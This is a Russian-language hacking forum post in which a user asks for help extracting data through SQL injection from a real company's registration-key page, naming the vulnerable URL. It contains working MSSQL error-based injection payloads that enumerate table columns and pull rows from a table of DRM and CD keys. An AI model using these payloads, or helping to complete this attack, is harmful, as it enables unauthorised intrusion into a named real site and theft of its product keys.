Показать сообщение отдельно

  #1  
Старый 27.08.2011, 23:17
KUKLOVOD2
Познающий
Регистрация: 12.05.2011
Сообщений: 88
С нами: 7896566

Репутация: 1
По умолчанию

Цитата:
Сообщение от KUKLOVOD2  
значит все пытаюсь раскрутить эту скулю.Наблюдается интересное явление:при запросе
Код:
Email=1')+or+1=(SELECT+TOP+1+COLUMN_NAME+FROM+INFO RMATION_ SCHEMA.COLUMNS+WHERE+TABLE_NAME='View_DRM_Keys'+AN D+COLUMN_NAME+NOT+IN+('asscode ','assigndate','AssignedDate','assignedtype','assi gnusername','binary_message_body','cdkey','CDSeria lNum'))--+&submit=Send+Registration+Key
мы видим что существует колонка code в таблице View_DRM_Keys.Но когда делаем выборку:
Код:
Email=1')+or+1=(SELECT+TOP+1+code+from+View_DRM_Ke ys)--+&submit=Send+Registration+Key
видим следующее:Invalid column name 'code'.Почему так?
Потом поэксперементировав я обнаружил, что вытаскивая колонки из разных таблиц, вытакскиваются колонки с одними и теме же именами, хотя в данных таблицах они могут и не существовать.Что можно предпринять?
up, вопрос еще актуален.Уязвимый сайт: http://socketmobile.com/support/wifi/pw.asp
 
Ответить с цитированием